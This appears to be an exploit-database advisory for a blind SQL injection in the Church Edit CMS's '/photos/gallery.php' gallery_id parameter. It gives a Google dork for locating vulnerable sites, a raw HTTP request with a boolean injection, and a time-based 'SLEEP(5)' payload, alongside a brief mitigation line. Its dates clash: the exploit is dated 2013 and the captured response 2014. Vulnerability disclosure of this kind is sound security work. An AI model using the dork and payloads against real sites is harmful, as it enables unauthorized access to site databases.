Church Edit Blind SQL Injection

vendor:

Church Edit

by:

ThatIcyChill

8,8

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Church Edit

Affected Version From: Initial Release

Affected Version To: Initial Release

Patch Exists: No

Related CWE: N/A

CPE: a:churchedit:church_edit

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

Church Edit Blind SQL Injection

The file '/photos/gallery.php' contains a Blind SQL Injection Vulnerability in the '?gallery_id=' variable in the URL.

Mitigation:

Input validation and sanitization should be done on all user input.

Source

Exploit-DB raw data:

Exploit Title: Church Edit Blind SQL Injection
Google Dork: inurl:This website is powered by Church Edit
Date: 15/3/2013
Exploit Author: ThatIcyChill
Vendor Homepage: http://www.churchedit.co.uk/
Version: Initial Release
��������������������������������������������������������������������

The file "/photos/gallery.php" contains a Blind SQL
Injection Vulnerability in the '?gallery_id=' variable in the URL.

��������������������������������������������������������������������
GET /photos/gallery.php?gallery_id=1%20and%201=2&pg=1 HTTP/1.1
Host: <>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 15 Mar 2014 17:42:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
��������������������������������������������������������������������

Sample injection - www.example.org/photos/gallery.php?gallery_id=1 AND SLEEP(5)&pg=1